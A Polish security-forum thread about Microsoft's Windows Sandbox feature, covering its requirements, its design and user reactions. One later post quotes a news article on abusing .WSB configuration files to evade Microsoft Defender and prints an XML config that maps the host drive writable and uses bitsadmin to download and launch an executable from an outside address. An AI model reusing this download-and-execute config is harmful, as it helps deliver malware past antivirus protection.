Windows Sandbox (Windows 10 Pro/Enterprise)
#1
[Obrazek: Optional%20Windows%20Features%20dlg.png]

Microsoft idzie "za ciosem" i wprowadza kolejne oczekiwane...a może właściwiej "bardziej oczekiwane"...rozwiązanie,

[Aby zobaczyć linki, zarejestruj się tutaj]

czyli swoją własną wewnętrzna piaskownicę. Opis poniżej

Cytat:Bezpieczne graficzne środowisko uruchomieniowe, czyli piaskownica (ang. sandbox) trafi do systemów Windows 10 Pro i Enterprise, dając możliwość uruchomienia bez szkody podejrzanej aplikacji w odizolowanym środowisku. Złośłiwe załączniki pochodzące z kampanii ze spamem, dokumenty (faktury), skrypty oraz programy będzie można uruchomić i przetestować pod kątem szkodliwych aktywności bez większych obaw o zainfekowanie środowiska pracy.
(...)
Koncepcja zastosowana przez Microsoft jest w zasadzie pamieszaniem piaskownicy z maszyną wirtualną, w której będzie można pobrać i uruchomić dowolny kod, plik, program, dokument, wykonać bezpieczny przelew.

Wymagania Windows Sandbox:

    Dostępność dla Windows 10 Pro i Enterprise od wersji Windows 18305.  
    Włączona wirtualizacja w ustawieniach BIOSU-u.
    Co najmniej 4GB RAM (zalecane 8GB).
    Wolnej przestrzeni 1GB (rekomendowany dysk SSD).
    Co najmniej 2-rdzeniowy CPU ze wsparciem wielowątkowości.

Zasada działania:

    Piaskownica przez każdym uruchomieniem będzie zerowana do ustawień fabrycznych (system automatycznie zadba o przywrócenie migawki do stanu początkowego).
    Wszystkie wprowadzone zmiany w piaskownicy nie będą zapisywane na stałe.
    Piaskownica będzie wykorzystywać wirtualizację sprzętową dla oddzielnego jądra za pomocą hiperwizora Microsoftu (stąd wysokie wymagania).
    Piaskownica będzie zachowywać się jako osobny system operacyjny w Windows, ale z oddzielnym jądrem, innym zarządzeniem pamięcią i wirtualną kartą graficzną.  
(...)
Podsumowując, piaskownica Microsoftu to tak naprawdę maszyna wirtualna wykorzystująca wbudowany hiperwizor, posiadający funkcję przywracania migawek (przy każdym uruchomieniu), nowe zarządzanie pamięcią (które pozwala odzyskać pamięć RAM po zamknięciu pisakownicy) oraz dynamiczne i statyczne dzielenie się z plikami z hostem, które są wymagane do działania Windows Sandbox. W efekcie nowa "piaskownica-maszyna-wirtualna" waży 100 MB zamiast kilku gigabajtów. Windows Sandbox ma również zadbać o stan baterii komputera, która ma to kluczowe znaczenie w laptopach, gdzie oszczędzanie energii jest ważne dla użytkownika.
Źródło cytatu

[Aby zobaczyć linki, zarejestruj się tutaj]


Dodatkowe informacje - szczegóły, technikalia w oryginalnym artykule MS

[Aby zobaczyć linki, zarejestruj się tutaj]

"Bezpieczeństwo jest podróżą, a nie celem samym w sobie - to nie jest problem, który można rozwiązać raz na zawsze"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"
Odpowiedz
#2
Jest już dostępna wersja wersja testowa posiadająca sandbox.

[Aby zobaczyć linki, zarejestruj się tutaj]

Odpowiedz
#3
To trzeba przyznać funkcja mocno na plus.
Już od jakiegoś czasu Windows nie potrzebuje dodatkowego softu, teraz może nawet obędzie się bez nieco bardziej rozbudowanych narzędzi.
Odpowiedz
#4
jak windows już ma piaskownice to może jakaś korporacja pofatyguje sie po nowe testy tym razem nie antywirusowe tylko szczelność penetracji piaskownicy Smile

Ja na razie nie mam czasu by bawić sie w świat IT teraz jest świat Desing.
Puki co to Zbush katuje na nowych ramach.. w sumie te same tylko dodatkowe dokupiłem Smile

Więc jak ktoś lubi bazowe oprogramowanie M$ to będzie miał kolejny przydatny soft Smile
Szkoda że sysinternals suite dalej jest jako osobny dodatek do systemy.. a nie wbudowany
Warstwy ochrony

1)Ograniczenie/blokowanie dostępu do danych/aplikacji
2)Odizolowanie i tworzenie osobnych baz danych/aplikacji
3)Kopia zapasowa systemu/ważnych danych.
4)Wykrywanie i kasowanie wirusów/złośliwych aplikacji.
Odpowiedz
#5
Niestety u mnie sandbox nie działa, w ogóle nie odpala :/
Odpowiedz
#6
No i zonk Smile A miało być pięknie...haha...ale nie ma co narzekać, bo narzędzie jest póki co eksperymentem...dlatego nie widzę sensu żeby je jakoś specjalnie testować.
"Bezpieczeństwo jest podróżą, a nie celem samym w sobie - to nie jest problem, który można rozwiązać raz na zawsze"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"
Odpowiedz
#7
Dokładnie @ichito... poza tym nie zapominajmy to nadal twór od M$ czyli w wersji stabilnej przez lata może być jaki będzie ^^
Warstwy ochrony

1)Ograniczenie/blokowanie dostępu do danych/aplikacji
2)Odizolowanie i tworzenie osobnych baz danych/aplikacji
3)Kopia zapasowa systemu/ważnych danych.
4)Wykrywanie i kasowanie wirusów/złośliwych aplikacji.
Odpowiedz
#8
Wracam do tematu piaskownicy Windowsowej, ponieważ ciekawa informacja o możliwości jej wykorzystania w celu ataku na system ukazała się na łamach AVLab.

Cytat:Funkcja Windows Sandbox została

[Aby zobaczyć linki, zarejestruj się tutaj]

do Windows 10 Pro i Windows 10 Enterprise jako uzupełnienie zabezpieczeń systemowych przed exploitami. Niestety nie w pełni zostało to przetestowane pod kątem bezpieczeństwa, ponieważ początkowo funkcja piaskownicy miała pomagać w walce przeciwko exploitom na antywirusa Microsoft Defender. Używanie exploitów to niebezpieczny proceder, ponieważ za pomocą luki w antywirusie możliwe jest uruchomienie kodu z uprawnieniami systemowymi. „Sandboksowanie” miało przed tym chronić. I zamiast zabezpieczeń mamy nowy sposób używania systemowych funkcji do oszukiwania antywirusa Microsoft Defender.
(...)
Windows Sandbox może używać plików z rozszerzeniem *.WSB jako dodatkowej konfiguracji dla maszyny wirtualnej. Jest to zwykły plik XML z informacjami technicznymi np. ilościami rdzeni CPU, współdzieleniem schowka, karty sieciowej itp. Więcej danych na ten temat podaje firma Microsoft na 

[Aby zobaczyć linki, zarejestruj się tutaj]

oraz 

[Aby zobaczyć linki, zarejestruj się tutaj]

. Dodajmy, że rozszerzenie WSB jest domyślne skojarzone z programem WindowsSandbox.exe.

Internauta opisał

[Aby zobaczyć linki, zarejestruj się tutaj]

jak obejść zabezpieczenia antywirusa Microsoft Defender za pomocą Windows Sandbox. Stworzył konfigurację XML zawierającą polecenia pobierające szkodliwy plik.

Kod:
<Configuration>
  <MappedFolders>
   <MappedFolder>
     <HostFolder>C:\</HostFolder>
     <SandboxFolder>C:\Users\WDAGUtilityAccount\UserFiles</SandboxFolder>
     <ReadOnly>false</ReadOnly>
   </MappedFolder>
  </MappedFolders>
  <LogonCommand>
    <Command>C:\Users\ping 127.0.0.1 -n 3>null&bitsadmin /transfer myjob /download /priority high http://192.168.0.4/cs_wsb_test.bin "%APPDATA%\cs.exe">nul&start %APPDATA%\cs.exe</Command>
  </LogonCommand>
</Configuration>
Tym oto sposobem zespoły red-team i cyberprzestępcy uzyskali nową sposobność na obchodzenie zabezpieczeń Windows. Brawo!
Całość poniżej

[Aby zobaczyć linki, zarejestruj się tutaj]

"Bezpieczeństwo jest podróżą, a nie celem samym w sobie - to nie jest problem, który można rozwiązać raz na zawsze"
"Zaufanie nie stanowi kontroli, a nadzieja nie jest strategią"
Odpowiedz


Skocz do:


Użytkownicy przeglądający ten wątek: 1 gości